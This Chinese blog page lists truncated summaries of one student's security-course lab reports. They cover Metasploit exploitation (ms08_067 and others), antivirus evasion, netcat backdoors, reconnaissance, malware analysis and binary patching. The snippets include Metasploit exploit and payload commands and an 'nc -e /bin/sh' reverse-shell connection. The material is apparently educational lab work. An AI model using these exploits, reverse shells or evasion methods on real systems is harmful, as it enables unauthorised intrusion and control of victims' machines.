Exp5MSF基础应用——20164325王晓蕊

【Exp5MSF基础应用——20164325王晓蕊】的更多相关文章

Exp5MSF基础应用——20164325王晓蕊

1.实验要求一个主动攻击实践,ms08_067; 一个针对浏览器的攻击,MS11-003(唯一): 一个针对客户端的攻击,adobe_toolbutton: 成功应用任何一个辅助模块Ipidseq(唯一). 2.实验过程 2.1一个主动攻击实践,ms08_067 2.1.1在攻击机kali输入msfconsole进入控制台,依次输入以下指令: use exploit/windows/smb/ms08_067_netapi show payloads set payload generic/sh…

Exp3 免杀原理与实践 ——20164325王晓蕊

一.实践基本内容 1.实践目标 (1) 正确使用msf编码器(√),msfvenom生成如jar之类的其他文件(√),veil-evasion(√),加壳工具(√),使用shellcode编程(√) (2)通过组合应用各种技术实现恶意代码免杀(√) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) (3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(√) 2.实践基础问题回答 (1)杀软是如何检测出恶意代码的? 杀软有一个病…

Exp2 后门原理与实践-------20164325王晓蕊

Exp2 后门原理与实践任务一:使用netcat获取主机操作Shell,cron启动 1.windows获取linux shell 1.1 ipconfig 查看本机查看以太网适配器(8)的ipv4地址 1.2windows: ncat.exe -l -p 调用ncat.exe程序来蹲守本机的4325端口 1.3 nc –e /bin/sh 在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口: 2.linux获得windows shell 2.1 Ka…

Exp6 信息搜集与漏洞扫描——20164325王晓蕊

1.实践目标掌握信息搜集的最基础技能与常用工具的使用方法. 2.实践内容 2.1 各种搜索技巧的应用 2.1.1 Netcraft查询 Netcraft这个网站可以查询到特定网站的IP地址,以weibo.com为例; 我们可以看到主机信息——linux操作系统,weibo的服务器: 我针对这个IP——36.51.254.234进行一次whois查询(可以看到网站的服务器提供商.) 2.1.2 IP2Loaction 如果目标在国内的话,更推荐纯真IP库(http://www.cz88.net)…

Exp4 恶意代码分析 ——20164325王晓蕊

1.实践目标监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals,systracer套件. 假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质. 2.实践内容 2.1系统运行监控使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里.运行一段时间并分析该文件,…

Exp1 PC平台逆向破解----20164325 王晓蕊

前言:实验中用到的知识 JE:条件转移指令,如果相等则跳转: JNE:条件转移指令(等同于“Jump Not Equal”),如果不相等则跳转: JMP:无条件跳转指令.无条件跳转指令可转到内存中任何程序段.转移地址可在指令中给出,也可以在寄存器中给出,或在存储器中指出: NOP:“空指令”.执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令: CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果.cmp指令执行后,将对标志寄存器产…